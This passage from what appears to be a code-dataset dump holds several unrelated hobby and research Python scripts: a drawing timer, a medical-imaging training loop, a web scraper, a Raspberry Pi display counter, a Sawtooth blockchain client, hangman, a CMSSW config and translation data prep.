)\n\n\n","sub_path":"casp_scripts/check_gdt_histograms.py","file_name":"check_gdt_histograms.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378170633","text":"from tkinter import *\nimport subprocess #do otwierania folderow\nimport os #do tworzenia folderow\nimport datetime #do pobierania daty\nfrom tkinter.filedialog import askopenfilename #do wybierania pliku\nimport shutil #kopiowanie pliku\nimport time #odliczanie sekund rysowania\nimport math #do zaokraglen\n\n\nPROJECTS_DIR = \".\\Projects\"\nDRAWING = False\nstart = 0\ntodayTimer = 0\nsumTodayTimer = 0\n\n#funkcje\n\ndef copyFileToActualWeekFolder():\n createFolder(PROJECTS_DIR+'\\\\'+getWeekId())\n try:\n srcFilePath = selectFile()\n extension = os.path.splitext(srcFilePath)[1][1:]\n now = datetime.datetime.now()\n dstFilePath = PROJECTS_DIR+'\\\\'+getWeekId()+'\\\\'+now.strftime(\"%A\")+'.'+extension\n #os.system('copy '+srcFilePath+' '+dstFilePath)\n shutil.copy2(srcFilePath, dstFilePath)\n print(\"Copied from \\n\"+srcFilePath+\"\\nto\\n\"+dstFilePath)\n except:\n print(\"ERROR copyFileToActualWeekFolder()\")\n pass\n\ndef selectFile():\n #returns path to file\n filename = askopenfilename(initialdir = \"/\",title = \"Wybierz pracę\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"png files\",\"*.png\")))\n print(filename)\n return filename\n\ndef drawingTimer():\n global DRAWING\n global start\n global todayTimer\n global sumTodayTimer\n isOkay = False\n if(DRAWING == False):\n print(\"Started drawing!\")\n start = time.time()\n DRAWING = True\n isOkay = False\n return 0\n if(DRAWING == True):\n print(\"Stopped drawing!\")\n end = time.time()\n DRAWING = False\n isOkay = True\n if(isOkay):\n print(\"Time passed: \"+str(math.ceil(end-start)))\n todayTimer = todayTimer + math.ceil(end-start)\n print(\"Time today: \"+str(todayTimer))\n return todayTimer\n\ndef returnTimeDrawing():\n return todayTimer\n\ndef getWeekId():\n #returns string year+week_number\n now = datetime.datetime.now()\n dt = datetime.date(now.year, now.month, now.day)\n wk = dt.isocalendar()[1]\n return str(now.year)+\" \"+str(wk)\n\ndef createFolder(location):\n try:\n if not os.path.isdir(location):\n os.makedirs(location)\n print(\"Folder created\")\n else:\n print(\"Folder exists\")\n except:\n print(\"ERROR createFolder()\")\n pass\n\ndef openFolder(location):\n createFolder(location)\n subprocess.Popen('explorer \"'+location+'\"')\n print(\"Opening \"+location)\n\ndef clock():\n infoDzisiejszyTimerLabel.config(text=\"Dziś rysujesz: \"+str(math.floor(returnTimeDrawing()/3600)%24)+\":\"+str(math.floor(returnTimeDrawing()/60)%60)+\":\"+str(returnTimeDrawing()%60))\n if(DRAWING == True):\n otworzFolderGlownyButton.config(state=DISABLED)\n otworzFolderTygodniowyButton.config(state=DISABLED)\n dodajPraceButton.config(state=DISABLED)\n rysujButton.config(text=\"Zatrzymaj rysowanie\")\n if(DRAWING == False):\n otworzFolderGlownyButton.config(state=\"normal\")\n otworzFolderTygodniowyButton.config(state=\"normal\")\n dodajPraceButton.config(state=\"normal\")\n rysujButton.config(text=\"Kontynuuj rysowanie\")\n master.after(100,clock)\n\nmaster = Tk()\nmaster.title('DrawIt!')\n\notworzFolderGlownyButton = Button(master, text=\"Otwórz folder ze wszystkimi tygodniami\", command=lambda:openFolder(\".\\Projects\"))\notworzFolderGlownyButton.pack()\n\notworzFolderTygodniowyButton = Button(master, text=\"Otwórz folder tego tygodnia\", command=lambda:openFolder(\".\\Projects\\\\\"+getWeekId()))\notworzFolderTygodniowyButton.pack()\n\ndodajPraceButton = Button(master, text=\"Dodaj dzisiejszą pracę\", command=lambda:copyFileToActualWeekFolder())\ndodajPraceButton.pack()\n\n#master.state('zoomed') #fullscreen?\n\ninfoAktualnyTydzienLabel = Label(master, text=\"Aktualny tydzień: \"+getWeekId())\ninfoAktualnyTydzienLabel.pack()\n\nprint (\"Current year and week \"+getWeekId())\n\nrysujButton = Button(master, text=\"Kontynuuj rysowanie\", command=lambda:drawingTimer())\nrysujButton.pack()\n\ninfoDzisiejszyTimerLabel = Label(master, textvariable=\"\")\ninfoDzisiejszyTimerLabel.pack()\n\nclock()\nmaster.mainloop()\nprint(\"ENDING\")\n\n\n","sub_path":"Windows/src/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311645733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAdversarial Robustness Study of Convolutional Neural Network for Lumbar Disk Shape Reconstruction from MR images \n(Jiasong Chen, Linchen Qian, Timur Urakov, Weiyong Gu, Liang Liang at University of Miami)\npublished at SPIE Medical Imaging: Image Processing, 2021\n\n\"\"\"\nimport os \nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport torch\nfrom torch.optim import Adamax\nfrom tqdm import tqdm\nimport argparse\nfrom Lumbar_Dataset import DiskSet\nfrom Lumbar_Dataset import DiskSet_example\nfrom Resnet18Unet import Resnet18Unet\nfrom PCA_Aug import PCA_Aug_Dataloader\nfrom Disk_regseg_train import train, test, plot_history, save_checkpoint, load_checkpoint\n#%%\n#https://pytorch.org/docs/stable/notes/randomness.html\n#https://pytorch.org/docs/stable/cuda.html\nimport random\nrandom.seed(0)\nnp.random.seed(0)\ntorch.manual_seed(0)\ntorch.cuda.manual_seed(0)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nos.environ['PYTHONHASHSEED'] = str(0)\n#%%\nif __name__ == '__main__':\n #%%\n parser = argparse.ArgumentParser(description='Input Parameters:')\n parser.add_argument('--net_name', default='Resnet18Unet', type=str)\n parser.add_argument('--n_components', default=10, type=int)\n parser.add_argument('--n_batches', default=100, type=int)\n parser.add_argument('--epoch_start', default=0, type=int)\n parser.add_argument('--epoch_end', default=1000, type=int)\n parser.add_argument('--cuda_id', default=0, type=int)\n parser.add_argument('--path', default='../data/', type=str)\n parser.add_argument('--path_aug', default='../data/', type=str)\n arg = parser.parse_args()\n print(arg)\n device = torch.device(\"cuda:\"+str(arg.cuda_id) if torch.cuda.is_available() else \"cpu\")\n #%%\n loader_train=PCA_Aug_Dataloader(n_epochs=100, n_batches=arg.n_batches, batch_size=64, device=device, shuffle=True,\n filename=arg.path_aug+'pca_aug_P'+str(arg.n_components)+'b'+str(arg.n_batches)+'n64',\n n_components=arg.n_components, c_max=2, flag=0, train=True, path=arg.path)\n loader_val=PCA_Aug_Dataloader(n_epochs=1, n_batches=100, batch_size=64, device=device, shuffle=False,\n filename=arg.path_aug+'pca_aug_P30b100n64',\n n_components=30, c_max=2, flag=0, train=True, path=arg.path)\n Dataset_test = DiskSet_example(arg.path, 'aug_data_example_test.txt')\n loader_test = torch.utils.data.DataLoader(dataset=Dataset_test,batch_size = 64, shuffle = False, num_workers=0)\n #%%\n filename='result/'+arg.net_name+'_disk_pca_regseg_P'+str(arg.n_components)+'b'+str(arg.n_batches)\n print('save to', filename)\n #%%\n if arg.net_name == 'Resnet18Unet':\n model = Resnet18Unet(352, 1).to(device)\n optimizer = Adamax(model.parameters(),lr = 0.001)\n history={'loss1_train':[], 'loss2_train':[], 'loss3_train':[],\n 'mrse_val':[], 'dice1_val':[], 'dice2_val':[],\n 'mrse_test':[], 'dice1_test':[], 'dice2_test':[]}\n #%% load model state and optimizer state if necessary\n epoch_save=arg.epoch_start-1\n if epoch_save>=0:\n load_checkpoint(filename+'_epoch'+str(epoch_save)+'.pt', model, optimizer, history)\n #%%\n for epoch in tqdm(range(epoch_save+1, arg.epoch_end), initial=epoch_save+1, total=arg.epoch_end):\n loss_train = train(model, device, optimizer, loader_train, epoch)\n mrse_val, dice1_val, dice2_val = test(model, device, loader_val)\n mrse_test, dice1_test, dice2_test = test(model, device, loader_test)\n history['loss1_train'].append(loss_train[0])\n history['loss2_train'].append(loss_train[1])\n history['loss3_train'].append(loss_train[2])\n history['mrse_val'].append(mrse_val.mean())\n history['dice1_val'].append(dice1_val.mean())\n history['dice2_val'].append(dice2_val.mean()) \n history['mrse_test'].append(mrse_test.mean())\n history['dice1_test'].append(dice1_test.mean())\n history['dice2_test'].append(dice2_test.mean()) \n #------- show result ----------------------\n display.clear_output(wait=False)\n fig1, ax1 = plot_history(history) \n display.display(fig1) \n fig2, ax2 = plt.subplots()\n ax2.hist(mrse_test, bins=50, range=(0,10))\n ax2.set_xlim(0, 10)\n display.display(fig2)\n #----------save----------------------------\n if (epoch+1)%100 == 0:\n save_checkpoint(filename+'_epoch'+str(epoch)+'.pt', model, optimizer, history, epoch)\n fig1.savefig(filename+'_epoch'+str(epoch)+'_history.png')\n fig2.savefig(filename+'_epoch'+str(epoch)+'_mrse_test.png')\n epoch_save=epoch\n plt.close(fig1)\n plt.close(fig2)\n\n","sub_path":"code/IND/Disk_pca_regseg_train.py","file_name":"Disk_pca_regseg_train.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"276423930","text":"import matplotlib.pyplot as plt\nimport fix_yahoo_finance as yf\nimport pandas as pd\n\ndef import_data(company,sdate,edate):\n '''\n company='GOOGL'\n sdate='2016-01-01'\n edate='2019-03-14'\n '''\n data = yf.download(company,sdate,edate)\n path=company+'.csv'\n data.to_csv(index=True,index_label='date',path_or_buf=path)\n data.Close.plot()\n #plt.show()\n\ndef read_full(filename):\n df=pd.read_csv(filename)\n return df\n \ndef read_spec(filename):\n df=pd.read_csv(filename)\n df = df[['Close']]\n return df\n\ndef main():\n company='AAPL'\n sdate='2016-01-01'\n edate='2019-03-14'\n choice=1\n filename=company+'.csv'\n df=pd.DataFrame()\n import_data(company,sdate,edate)\n if choice==1:\n print()\n df=read_full(filename)\n else :\n print()\n df=read_spec(filename)\n print(df)\n \n\nmain()\n \n","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"165744080","text":"\"\"\"\nעליכם קריאה של 10 אתרים ולכתוב :\nא.\tלהציג את שם האתר\nב.\tלהציג את תוכן קוד האתר בPrint\nג.\tלכתוב לתוך קובץ את תוכן האתר\nד.\tלהציג זמן כולל של הפעולות (import time)\n\n1.\tשלב ראשון בצע ללא Thread ReadSitesNoThread.py\n2.\tשלב שני בצע Thread ReadSiteThread.py\n\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nimport threading\n\nurl_site =[\"https://www.ynet.co.il/home/0,7340,L-8,00.html\",\n \"https://corona.mako.co.il/\",\n \"https://13tv.co.il/\",\n \"https://edition.cnn.com/\",\n \"https://www.youtube.com/?gl=IL\",\n \"https://www.calcalist.co.il/home/0,7340,L-8,00.html\",\n \"https://www.one.co.il/\",\n \"https://www.google.co.il/?hl=iw\",\n \"https://www.maariv.co.il/news\",\n \"https://www.apple.com/\"\n ]\n\n\ndef Deal_with_site(url):\n get_html_page = requests.get(url).content # get html code of site\n soup = BeautifulSoup(get_html_page, \"html.parser\")\n title = soup.title # get title of site\n print(\"\\033[1;35m\"+title.get_text()+\"\\033[1;37m\")\n print(soup.prettify())\n\n with open('Sitedatathread.txt', \"wb\") as writer: # create file with content of site\n writer.write(soup.prettify().encode(\"utf-8\"))\n writer.close()\n\n\nstart_time = time.perf_counter()\n\nthreads = []\nfor site in url_site: # make all the Deal sites as a thread\n th = threading.Thread(target=Deal_with_site, args=(site,))\n th.start()\n threads.append(th)\n\nfor thread in threads:\n\n thread.join()\n\nend_time = time.perf_counter()\nprint(\"Toatl Time is :\", end_time-start_time, \"sec\")\n","sub_path":"Threading/GetSitesWithThread.py","file_name":"GetSitesWithThread.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315931220","text":"import RPi.GPIO as GPIO #Header file for pi header pins.\r\nimport time #Time package that should be included with python download\r\nGPIO.setmode(GPIO.BCM) #this references the pin numbers on the pi. One could use the BOARD.\r\n\r\nsegments = (26,12,5,27,17,23,6) #this assigns the seven pins on the board to the segment tuple variable.\r\n\r\nfor segment in segments:\r\n GPIO.setup(segment, GPIO.OUT)\r\n GPIO.output(segment, 0)\r\n#the above for loop assigns the segments variables as GPIO pins and sets their output to off\r\n\r\ndigits = (13,25,24,22) #this assigns the pin numbers to a digits tuple variable\r\n\r\nfor digit in digits:\r\n GPIO.setup(digit, GPIO.OUT)\r\n GPIO.output(digit, 1)\r\n#this does the same thing as the segments for loop above but turns on the output for each of the digits\r\n\r\nnum = {' ':(0,0,0,0,0,0,0), \r\n '0':(1,1,1,1,1,1,0),\r\n '1':(0,1,1,0,0,0,0),\r\n '2':(1,1,0,1,1,0,1),\r\n '3':(1,1,1,1,0,0,1),\r\n '4':(0,1,1,0,0,1,1),\r\n '5':(1,0,1,1,0,1,1),\r\n '6':(1,0,1,1,1,1,1),\r\n '7':(1,1,1,0,0,0,0),\r\n '8':(1,1,1,1,1,1,1),\r\n '9':(1,1,1,1,0,1,1)}\r\n#this is a dictionary of tuples, this is the way to make a multi-demsional\r\n#associative array\r\n\r\ntry:\r\n for w in range(1):\r\n for x in range(0,10):\r\n s = str(x)\r\n for loop in range(0,7):\r\n GPIO.output(segments[loop], num[s[0]][loop])\r\n GPIO.output(digits[w],0)\r\n time.sleep(.5)\r\n GPIO.output(digits[w],1)\r\n\r\nfinally:\r\n GPIO.cleanup()\r\n","sub_path":"numbercount2.py","file_name":"numbercount2.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"515776823","text":"\n# should be very similar to the xo_client\n# read the transaction family description and docs and then map that into code.\n# the sawtooth_sdk protobuf libraries make that simple\n\nfrom urllib.error import HTTPError\nimport urllib.request\nfrom sawtooth_sdk.protobuf.batch_pb2 import BatchList\nfrom sawtooth_sdk.protobuf.batch_pb2 import Batch\n\nimport cbor\n\nimport protosma_pb2\n\nfrom sawtooth_signing import create_context\nfrom sawtooth_signing import CryptoFactory\n\nimport hashlib\n\nfrom sawtooth_sdk.protobuf.transaction_pb2 import TransactionHeader\nfrom sawtooth_sdk.protobuf.transaction_pb2 import Transaction\n\n\nfrom sawtooth_sdk.protobuf.batch_pb2 import BatchHeader\n\n# print(dir(protosma_pb2.SmallbankTransactionPayload))\n\n\nCUSTOMER_ID = 99999\nCUSTOMER_NAME='SPT6JfkNQFECDa3XyH0k'\n\n\ncontext = create_context('secp256k1')\nprivate_key = context.new_random_private_key()\nsigner = CryptoFactory(context).new_signer(private_key)\n\n\ndef _sha512_small_bank(customer_id):\n\n firstpart = hashlib.sha512('smallbank'.encode('utf-8')).hexdigest()[0:6]\n secondpart = hashlib.sha512(str(customer_id).encode('utf-8')).hexdigest()[0:64]\n\n return firstpart + secondpart\n\n\nCUSTOMER_ADDRESS = _sha512_small_bank(CUSTOMER_ID)\n\n\n# create account for customer 1\n\n'''\nmessage CreateAccountTransactionData {\n // The CreateAccountTransaction creates an account\n\n // Customer ID\n uint32 customer_id = 1;\n\n // Customer Name\n string customer_name = 2;\n\n // Initial Savings Balance (in cents to avoid float)\n uint32 initial_savings_balance = 3;\n\n // Initial Checking Balance (in cents to avoid float)\n uint32 initial_checking_balance = 4;\n }\n'''\n\n# creating new accounts\nsmall_payload = protosma_pb2.SmallbankTransactionPayload(\n payload_type=protosma_pb2.SmallbankTransactionPayload.CREATE_ACCOUNT,\n create_account=protosma_pb2.SmallbankTransactionPayload.CreateAccountTransactionData(\n customer_id=CUSTOMER_ID,\n customer_name=CUSTOMER_NAME,\n initial_savings_balance=1000000,\n initial_checking_balance=1000000\n )\n)\n\npayload_bytes = small_payload.SerializeToString()\n\nprint(small_payload)\nprint(payload_bytes)\n\nprint(hashlib.sha512(payload_bytes).hexdigest())\n\n\n# print(payload_bytes)\n\n# create transaction headers\n\n# addresses\n\n\ntxn_header_bytes = TransactionHeader(\n family_name='smallbank',\n family_version='1.0',\n inputs=[CUSTOMER_ADDRESS],\n outputs=[CUSTOMER_ADDRESS],\n signer_public_key=signer.get_public_key().as_hex(),\n # In this example, we're signing the batch with the same private key,\n # but the batch can be signed by another party, in which case, the\n # public key will need to be associated with that key.\n batcher_public_key=signer.get_public_key().as_hex(),\n # In this example, there are no dependencies. This list should include\n # an previous transaction header signatures that must be applied for\n # this transaction to successfully commit.\n # For example,\n # dependencies=['540a6803971d1880ec73a96cb97815a95d374cbad5d865925e5aa0432fcf1931539afe10310c122c5eaae15df61236079abbf4f258889359c4d175516934484a'],\n dependencies=[],\n payload_sha512=hashlib.sha512(payload_bytes).hexdigest()\n).SerializeToString()\n\n\n# print(txn_header_bytes)\n\nheader_signature = signer.sign(txn_header_bytes)\n\nprint('public key: ' + signer.get_public_key().as_hex())\nprint('signature : ' + header_signature)\n\n# two mistakes synthactical mistakes !! on the wiki\ntxn = Transaction(header=txn_header_bytes,\n header_signature=header_signature, payload=payload_bytes)\n\n\ntxns = [txn]\n\nbatch_header_bytes = BatchHeader(\n signer_public_key=signer.get_public_key().as_hex(),\n transaction_ids=[txn.header_signature for txn in txns],\n).SerializeToString()\n\n\n# print(signature)\n\n\nsignature = signer.sign(batch_header_bytes)\n\nbatch = Batch(\n header=batch_header_bytes,\n header_signature=signature,\n transactions=txns\n)\n\nbatch_list_bytes = BatchList(batches=[batch]).SerializeToString()\n\n\n# print(batch_list_bytes)\n\n\n# send the batches\n\ntry:\n request = urllib.request.Request(\n 'http://localhost:8008/batches',\n batch_list_bytes,\n method='POST',\n headers={'Content-Type': 'application/octet-stream'})\n response = urllib.request.urlopen(request)\n print(response.status)\n\nexcept HTTPError as e:\n response = e.file\n","sub_path":"sawtooth_clients/smallbank_client.py","file_name":"smallbank_client.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"257797125","text":"# Hangman game\n\nimport random\n\nWORDLIST_FILENAME = 'wordlist.txt'\n\ndef load_words():\n '''\n Returns a list of valid words.\n '''\n print('Loading word list from file...')\n input_File = open(WORDLIST_FILENAME, 'r')\n content = input_File.read()\n word_list = content.split('\\n')\n try:\n word_list.remove('')\n except ValueError:\n print('There is no empty string')\n print(f'\\t {len(word_list)} words loaded.') \n return word_list\n\ndef choose_word(word_list):\n '''\n Returns a word from word_list at random\n '''\n return random.choice(word_list)\n\ndef is_word_guessed(secret_word, letters_guessed):\n '''\n This function returns True if secret_word has been guessed \n (ie, all the letters of secret_word are in letters_guessed)\n and False otherwise.\n\n Args:\n secret_word (str): the word the user is guessing.\n letters_guessed ([str]): what letters have been guessed so far.\n\n Returns:\n bool: True for success, False otherwise.\n '''\n is_in = [each_letter in letters_guessed for each_letter in secret_word]\n return all(is_in)\n\ndef get_guessed_word(secret_word, letters_guessed):\n '''\n This function returns a string that is comprised of letters and\n underscores, based on what letters in letters_guessed are in\n secret_word.\n\n Args:\n secret_word (str): the word the user is guessing.\n letters_guessed ([str]): what letters have been guessed so far.\n\n Returns:\n str: letters and underscores.\n '''\n list_of_chars = [each_letter if each_letter in letters_guessed else '_ ' for each_letter in secret_word]\n return ''.join(list_of_chars)\n\ndef get_available_letters(letters_guessed):\n '''\n This function returns all lowercase English letters that are\n not in letters_guessed.\n\n Args:\n letters_guessed ([str]): what letters have been guessed so far.\n\n Returns:\n str: lowercase English letters.\n '''\n from string import ascii_lowercase\n available = list(set(ascii_lowercase) - set(letters_guessed))\n available = sorted(available)\n return ''.join(available)\n\ndef hangman(secret_word):\n '''\n Starts up an interactive game of Hangman between the user\n and the computer.\n\n Args:\n secret_word (str): the word the user is guessing.\n '''\n print('Welcome to the game, Hangman!')\n print(f'I am thinking of a word that is {len(secret_word)} letters long.')\n print('-------------')\n\n mistakes_made = 0\n max_guess = 8\n\n letters_guessed = []\n is_winner = False\n is_done = False\n\n while not is_done:\n print(f'You have {max_guess - mistakes_made} guesses left.')\n available_letters = get_available_letters(letters_guessed)\n print(f'Available letters: {available_letters}')\n guess = input('Please guess a letter: ').lower()\n\n if guess in letters_guessed:\n print(\"Oops! You've already guessed that letter:\", end=' ')\n print(get_guessed_word(secret_word, letters_guessed))\n elif guess in secret_word:\n letters_guessed.append(guess)\n print('Good guess:', end=' ')\n print(get_guessed_word(secret_word, letters_guessed))\n if is_word_guessed(secret_word, letters_guessed):\n is_winner = True\n is_done = True\n else:\n letters_guessed.append(guess)\n print('Oops! That letter is not in my word:', end=' ')\n print(get_guessed_word(secret_word, letters_guessed))\n mistakes_made += 1\n if mistakes_made == max_guess:\n is_done = True\n \n print('-------------')\n \n if is_winner:\n print('Congratulations, you won!')\n else:\n print(f'Sorry, you ran out of guesses. The word was {secret_word}')\n\nif __name__ == '__main__':\n word_list = load_words()\n secret_word = choose_word(word_list).lower()\n hangman(secret_word)","sub_path":"your-project/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461930912","text":"import FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\noptions = VarParsing ('analysis')\noptions.parseArguments()\n\nprocess = cms.Process(\"GIFanlzrTest\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n# process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n # 'file:/afs/cern.ch/work/a/awisecar/ClusterChargeAnalyzer/CMSSW_6_2_12/src/IORawData/unpackerOutput.root'\n # 'file:/afs/cern.ch/work/a/awisecar/ClusterChargeAnalyzer/CMSSW_6_2_12/src/IORawData/ccHFO-09May/unpackerOutput_3600V.root'\n # 'file:/afs/cern.ch/work/a/awisecar/ClusterChargeAnalyzer/CMSSW_6_2_12/src/IORawData/ccCF4-21Feb/unpackerOutput_3600V.root'\n options.inputFiles\n )\n)\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n destinations = cms.untracked.vstring('myDebugOutputFile.txt'),\n debugModules = cms.untracked.vstring('*'),\n message = cms.untracked.PSet(threshold = cms.untracked.vstring('DEBUG'))\n)\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 10000\nprocess.source.duplicateCheckMode = cms.untracked.string('noDuplicateCheck')\n\nprocess.load(\"Configuration/Geometry/GeometryIdeal2015Reco_cff\")\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\nprocess.load(\"Configuration/StandardSequences/RawToDigi_Data_cff\")\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.load(\"RecoMuon.MuonSeedGenerator.standAloneMuonSeeds_cff\")\n\nprocess.GlobalTag.globaltag = '74X_dataRun2_Prompt_v0'\n\nprocess.options = cms.untracked.PSet(\n SkipEvent = cms.untracked.vstring('LogicError','ProductNotFound')\n)\n\n#=====================================================================================================\n#http://cmslxr.fnal.gov/source/EventFilter/CSCRawToDigi/plugins/CSCDCCUnpacker.cc\n#http://cmsdoxygen.web.cern.ch/cmsdoxygen/CMSSW_7_5_1/doc/html/db/dd7/cscUnpacker__cfi_8py_source.html\n#muonCSCDigis = EventFilter.CSCRawToDigi.muonCSCDCCUnpacker_cfi.muonCSCDCCUnpacker.clone()\nprocess.muonCSCDigis.SuppressZeroLCT =cms.untracked.bool(False)\n# EventDump works only partly in CMSSW_7_5_1\nprocess.muonCSCDigis.FormatedEventDump = cms.untracked.bool(False)\n# Unpack general status digis?\nprocess.muonCSCDigis.UnpackStatusDigis = cms.bool(True) \n# Unpack FormatStatus digi?\nprocess.muonCSCDigis.UseFormatStatus = cms.bool(True)\n# Turn on lots of output\n#process.muonCSCDigis.Debug = cms.untracked.bool(False)\n#process.muonCSCDigis.PrintEventNumber = cms.untracked.bool(False)\n# Visualization of raw data in corrupted events\n#process.muonCSCDigis.VisualFEDInspect = cms.untracked.bool(False)\n#process.muonCSCDigis.VisualFEDShort = cms.untracked.bool(False)\n#=====================================================================================================\n\n \nprocess.GIFanlzrTest = cms.EDAnalyzer('GIFanlzr',\n wireDigiTag = cms.InputTag(\"muonCSCDigis\", \"MuonCSCWireDigi\"),\n alctDigiTag = cms.InputTag('muonCSCDigis', 'MuonCSCALCTDigi'),\n clctDigiTag = cms.InputTag('muonCSCDigis', 'MuonCSCCLCTDigi'),\n lctDigiTag = cms.InputTag('muonCSCDigis', 'MuonCSCCorrelatedLCTDigi'),\n stripDigiTag = cms.InputTag(\"muonCSCDigis\", 'MuonCSCStripDigi'),\n comparatorDigiTag = cms.InputTag(\"muonCSCDigis\", \"MuonCSCComparatorDigi\"),\n tmbStatusDigiTag = cms.InputTag(\"muonCSCDigis\",\"MuonCSCTMBStatusDigi\"),\n #cscRecHitTag = cms.InputTag(\"csc2DRecHits\",\"\"),\n #cscSegTag = cms.InputTag(\"cscSegments\"),\n \n # technical info - statis digis, requires process.muonCSCDigis.UnpackStatusDigis = cms.bool(True) \n chamberTag = cms.untracked.int32(3), # 0 - both; 1 - ME1/1; 2 - ME2/1; # 3 - minCSC(904); \n anodeTag = cms.untracked.int32(0), # 0 - none; 1 - proceed; 2 - anodes only (test11)\n cathodeTag = cms.untracked.int32(1), # 0 - none; 1 - proceed; 2 - cathodes only (test11c) \n lctTag = cms.untracked.int32(0), # 0 - none; 1 - proceed; \n tmbTag = cms.untracked.int32(1), # 0 - none; 1 - proceed;\n debugTag = cms.untracked.int32(2), # 0 - no debug, 1 analyzer, 2 all (event printouts) \n outputFileName = cms.untracked.string(options.outputFile) \n)\n\n#process.p = cms.Path(process.muonCSCDigis)\nprocess.p = cms.Path(process.muonCSCDigis*process.GIFanlzrTest)\n","sub_path":"files_for_CMSSW_7_5_1/GifCSC/GIFanlzr/runGIFanlzr_cfg.py","file_name":"runGIFanlzr_cfg.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"107604281","text":"import time\r\nimport math\r\nimport pickle\r\nimport collections\r\nfrom nltk import word_tokenize\r\nimport nltk\r\nimport argparse\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.contrib import rnn\r\nimport re\r\nimport numpy as np\r\nfrom gensim.models import KeyedVectors\r\nfrom sklearn.decomposition import PCA\r\nfrom matplotlib import pyplot\r\n\r\n# argument\r\nargs = argparse.ArgumentParser()\r\nargs.add_argument(\"--language_src\")\r\nargs.add_argument(\"--language_targ\")\r\nargs.add_argument(\"--vocab_src\")\r\nargs.add_argument(\"--vocab_targ\")\r\nargs.add_argument(\"--word_emb_src\")\r\nargs.add_argument(\"--word_emb_targ\")\r\nargs.add_argument(\"--num_layers\")\r\nargs.add_argument(\"--num_hiddens\")\r\nargs.add_argument(\"--learning_rate\")\r\nargs.add_argument(\"--keep_prob\")\r\nargs.add_argument(\"--beam_width\")\r\nargs.add_argument(\"--batch_size\")\r\nargs.add_argument(\"--checkpoint\")\r\n\r\nargs = vars(args.parse_args())\r\n\r\n# Set paths\r\ntrain_english_path = args[\"language_src\"]\r\ntrain_vietnamese_path = args[\"language_targ\"]\r\nword2int_english_path = args[\"vocab_src\"] + \"word2int.pickle\"\r\nint2word_english_path = args[\"vocab_src\"] + \"int2word.pickle\"\r\nword2int_vietnamese_path = args[\"vocab_targ\"] + \"word2int.pickle\"\r\nint2word_vietnamese_path = args[\"vocab_targ\"] + \"int2word.pickle\"\r\n\r\nprint(\"Get and prepare data ...\")\r\n\r\ndef getSentList(path, n_sents):\r\n sentList = []\r\n with open(path) as f:\r\n for line in f.readlines()[:n_sents]:\r\n w = line.lower()\r\n w = re.sub(r\"([?.!,¿])\", r\" \\1 \", w)\r\n w = re.sub(r'[\" \"]+', \" \", w)\r\n #w = re.sub(r\"[^a-zA-Z?.!,¿]+\", \" \", w)\r\n w = w.strip()\r\n\r\n # Add sent to the list\r\n sentList.append(w)\r\n\r\n return sentList\r\n\r\n\r\n# Get train_english and train_vietnamese\r\ntrain_english = getSentList(train_english_path, 799622)\r\ntrain_vietnamese = getSentList(train_vietnamese_path, 799622)\r\n\r\ni = 0\r\nwhile(True):\r\n if len(train_english[i]) == 0 or len(train_vietnamese[i]) == 0:\r\n del train_english[i]\r\n del train_vietnamese[i]\r\n i += 1\r\n if i >= len(train_english):\r\n break\r\n'''\r\ni = 0\r\nwhile(True):\r\n if len(train_english[i]) >= 100 or len(train_vietnamese[i]) >= 100:\r\n del train_english[i]\r\n del train_vietnamese[i]\r\n i += 1\r\n if i >= len(train_english):\r\n break\r\n'''\r\n\r\nnltk.download('punkt')\r\n\r\n\r\nwords_english = []\r\n# Need to modify this later\r\nfor sent in train_english:\r\n for word in word_tokenize(sent):\r\n words_english.append(word)\r\n\r\nwords_vietnamese = []\r\n# Need to modify this later\r\nfor sent in train_vietnamese:\r\n for word in word_tokenize(sent):\r\n words_vietnamese.append(word)\r\n\r\n\r\n# Create word2int and int2word dictionary\r\nword_counter = collections.Counter(words_english).most_common()\r\n\r\nword2int_english = dict()\r\nword2int_english[\"\"] = 0\r\nword2int_english[\"\"] = 1\r\nword2int_english[\"\"] = 2\r\nword2int_english[\"\"] = 3\r\nfor word, _ in word_counter:\r\n word2int_english[word] = len(word2int_english)\r\n\r\nint2word_english = dict(\r\n zip(word2int_english.values(), word2int_english.keys()))\r\n\r\n# Save word2int and int2word into pickle 